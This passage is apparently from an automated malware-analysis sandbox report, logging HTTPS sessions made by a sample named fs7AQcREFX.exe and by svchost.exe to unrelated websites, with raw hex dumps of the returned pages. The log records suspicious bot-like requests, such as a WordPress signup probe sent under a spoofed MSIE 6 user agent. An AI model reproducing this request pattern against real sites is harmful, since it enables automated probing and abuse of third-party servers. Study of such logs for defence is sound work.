                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2918INData Raw: 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3e 0a 3c
                                                                                                                                                                                                                                                                                        Data Ascii: s="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt><
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2920INData Raw: 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72
                                                                                                                                                                                                                                                                                        Data Ascii: ss="spacer"></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wr
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2921INData Raw: 33 30 30 32 33 2d 20 4f 70 63 69 c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73
                                                                                                                                                                                                                                                                                        Data Ascii: 30023- Opcin 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <s
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2922INData Raw: 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f
                                                                                                                                                                                                                                                                                        Data Ascii: ntact-item"><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2924INData Raw: 69 67 68 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e
                                                                                                                                                                                                                                                                                        Data Ascii: ight"><div class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2925INData Raw: 34 62 66 0d 0a 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65
                                                                                                                                                                                                                                                                                        Data Ascii: 4bf/div><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC2926INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        19192.168.2.364801185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2825OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:00 UTC2825INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:00 GMT
                                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:00 UTC2826INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                                        Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        2192.168.2.35535783.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC0OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:15 UTC8068INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=98
                                                                                                                                                                                                                                                                                        Content-Length: 48939
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:14 GMT
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:15 UTC8068INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:15 UTC8071INData Raw: 35 36 31 32 38 2c 35 36 34 33 30 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 34 37 5d 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 73 28 5b 35 35 33 35 38 2c 35 36 37 36 30 2c 39 37 39 32 2c 36 35 30 33 39 5d 2c 5b 35 35 33 35 38 2c 35 36 37 36 30 2c 38 32 30 33 2c 39 37 39 32 2c 36 35 30 33 39 5d 29 7d 72 65 74 75 72 6e 21 31 7d 28 6f 5b 72 5d 29 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 2c 22 66 6c 61 67 22 21 3d 3d 6f 5b 72 5d 26 26 28 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75
                                                                                                                                                                                                                                                                                        Data Ascii: 56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55358,56760,9792,65039],[55358,56760,8203,9792,65039])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.su
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:15 UTC8079INData Raw: 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65 61 74 43 6f 75 6e 74 3d 27 69 6e 64 65 66 69 6e 69 74 65 27 20 62 65 67 69 6e 3d 27 30 27 20 6b 65 79 74 69 6d 65 73 3d 27 30 3b 2e 32 3b 2e 35 3b 31 27 20 6b 65 79 53 70 6c 69 6e 65 73 3d 27 30 2e 32 20 30 2e 32 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 36 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 38 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32
                                                                                                                                                                                                                                                                                        Data Ascii: 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repeatCount='indefinite' begin='0' keytimes='0;.2;.5;1' keySplines='0.2 0.2 0.4 0.8;0.2 0.6 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(8)' d='M0 12 V20 H4 V12
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:15 UTC8087INData Raw: 73 65 61 72 63 68 5f 70 6c 61 63 65 68 6f 6c 64 65 72 22 3a 22 53 65 61 72 63 68 20 6f 70 74 69 6f 6e 73 22 2c 22 73 75 62 6d 69 74 5f 74 69 63 6b 65 74 22 3a 22 53 75 62 6d 69 74 20 54 69 63 6b 65 74 22 2c 22 73 75 62 6d 69 74 5f 74 69 63 6b 65 74 5f 6c 6f 61 64 69 6e 67 22 3a 22 50 6c 65 61 73 65 20 57 61 69 74 2e 2e 2e 22 2c 22 74 79 70 65 5f 74 6f 5f 73 65 61 72 63 68 22 3a 22 54 79 70 65 20 74 6f 20 73 65 61 72 63 68 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6b 62 2d 73 75 70 70 6f 72 74 2f 61 73 73 65 74
                                                                                                                                                                                                                                                                                        Data Ascii: search_placeholder":"Search options","submit_ticket":"Submit Ticket","submit_ticket_loading":"Please Wait...","type_to_search":"Type to search"};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/kb-support/asset
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:15 UTC8095INData Raw: 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 7b 76 61 72 20 6c 6f 61 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6c 6f 61 64 22 29 3b 76 61 72 20 72 65 6d 6f 76 65 4c 6f 61 64 69 6e 67 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 6f 61 64 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 22 20 6c 6f 61 64 65 72 2d 72 65 6d 6f 76 65 64 22 3b 7d 2c 35 30 30 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63
                                                                                                                                                                                                                                                                                        Data Ascii: "text/javascript">document.addEventListener("DOMContentLoaded",function(event){var load=document.getElementById("load");var removeLoading=setTimeout(function(){load.className+=" loader-removed";},500);});</script><link rel="icon" href="https://dataform.c
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:15 UTC8103INData Raw: 61 67 65 5f 69 74 65 6d 20 70 61 67 65 2d 69 74 65 6d 2d 31 36 20 63 75 72 72 65 6e 74 5f 70 61 67 65 5f 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 35 38 20 61 63 74 20 66 69 72 73 74 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 48 6f 6d 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62
                                                                                                                                                                                                                                                                                        Data Ascii: age_item page-item-16 current_page_item menu-item-54058 act first"><a href='https://dataform.co.uk/' data-level='1'><span class="menu-item-text"><span class="menu-text">Home</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-ob
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:15 UTC8111INData Raw: 6d 74 3d 31 36 38 35 35 33 37 35 33 35 2a 31 30 30 30 3b 76 61 72 20 64 69 66 66 6d 73 3d 28 6e 6f 77 2d 67 6d 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 3b 63 3d 63 2e 72 65 70 6c 61 63 65 28 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6e 6f 2d 6a 73 2f 2c 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 27 29 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 3d 63 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d
                                                                                                                                                                                                                                                                                        Data Ascii: mt=1685537535*1000;var diffms=(now-gmt);</script><script type="text/javascript">var c=document.body.className;c=c.replace(/woocommerce-no-js/,'woocommerce-js');document.body.className=c;</script><script type='text/javascript' src='https://dataform


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        20192.168.2.364911188.114.97.7443C:\Users\user\Desktop\fs7AQcREFX.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:00 UTC2826OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:00 UTC2827INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:00 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                                        Expires: Wed, 31 May 2023 13:02:00 GMT
                                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H80QCn3YSgvw8%2Bi%2BdSsCc0%2FkCQZ1WILWDhhRa2N%2B%2B4z962ILLKfWaGmRDQLnOWxT1c6avvwGd5z4RtfmDXP7jGUv8ESrU7rDuEpaurn1k9TteMHYi6W2i47o"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                        CF-RAY: 7cff59fcf81e91e3-FRA
                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:00 UTC2827INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:00 UTC2827INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        21192.168.2.36499275.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:00 UTC2827OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
